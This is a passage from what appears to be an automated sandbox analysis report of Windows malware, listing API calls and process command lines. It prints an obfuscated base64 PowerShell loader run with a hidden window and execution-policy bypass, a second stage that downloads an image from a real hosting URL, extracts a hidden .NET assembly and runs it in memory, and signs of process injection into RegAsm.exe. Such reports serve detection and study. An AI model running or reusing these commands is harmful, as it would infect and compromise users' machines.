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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('hpYIrIKGX','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
Process injection Process 2272 resumed a thread in remote process 2680
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x0000035c
suspend_count: 1
process_identifier: 2680
1 0 0
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2140
thread_handle: 0x000002f8
process_identifier: 2136
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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KGXkhpYIrIKGXHMhpYIrIKGXdhpYIrIKGXBhhpYIrIKGXHIhpYIrIKGXdhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGchpYIrIKGXZQhpYIrIKGXghpYIrIKGXDhpYIrIKGXhpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGEhpYIrIKGXbgBkhpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGchpYIrIKGXdhpYIrIKGXhpYIrIKGXghpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEkhpYIrIKGXbgBkhpYIrIKGXGUhpYIrIKGXehpYIrIKGXhpYIrIKGX7hpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEkhpYIrIKGXbgBkhpYIrIKGXGUhpYIrIKGXehpYIrIKGXhpYIrIKGXghpYIrIKGXCshpYIrIKGXPQhpYIrIKGXghpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEYhpYIrIKGXbhpYIrIKGXBhhpYIrIKGXGchpYIrIKGXLgBMhpYIrIKGXGUhpYIrIKGXbgBnhpYIrIKGXHQhpYIrIKGXahpYIrIKGXhpYIrIKGX7hpYIrIKGXCQhpYIrIKGXYgBhhpYIrIKGXHMhpYIrIKGXZQhpYIrIKGX2hpYIrIKGXDQhpYIrIKGXThpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZwB0hpYIrIKGXGghpYIrIKGXIhpYIrIKGXhpYIrIKGX9hpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBzhpYIrIKGXHQh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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('hpYIrIKGX','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000300
1 1 0

NtResumeThread

 thread_handle: 0x000002a8
suspend_count: 1
process_identifier: 2136
1 0 0

NtResumeThread

 thread_handle: 0x000002fc
suspend_count: 1
process_identifier: 2136
1 0 0

NtResumeThread

 thread_handle: 0x00000448
suspend_count: 1
process_identifier: 2136
1 0 0

CreateProcessInternalW

 thread_identifier: 2276
thread_handle: 0x0000044c
process_identifier: 2272
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LnNrbmlMeXR0dVAvZWxpZi8yMTIuMzExLjU3MS43MDEvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000450
1 1 0

NtResumeThread

 thread_handle: 0x00000494
suspend_count: 1
process_identifier: 2136
1 0 0

NtResumeThread

 thread_handle: 0x000002bc
suspend_count: 1
process_identifier: 2272
1 0 0

NtResumeThread

 thread_handle: 0x00000310
suspend_count: 1
process_identifier: 2272
1 0 0

NtResumeThread

 thread_handle: 0x00000464
suspend_count: 1
process_identifier: 2272
1 0 0

NtResumeThread

 thread_handle: 0x00000588
suspend_count: 1
process_identifier: 2272
1 0 0

CreateProcessInternalW

 thread_identifier: 2684
thread_handle: 0x0000035c
process_identifier: 2680
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000384
1 1 0

NtGetContextThread

 thread_handle: 0x0000035c
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 1499136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
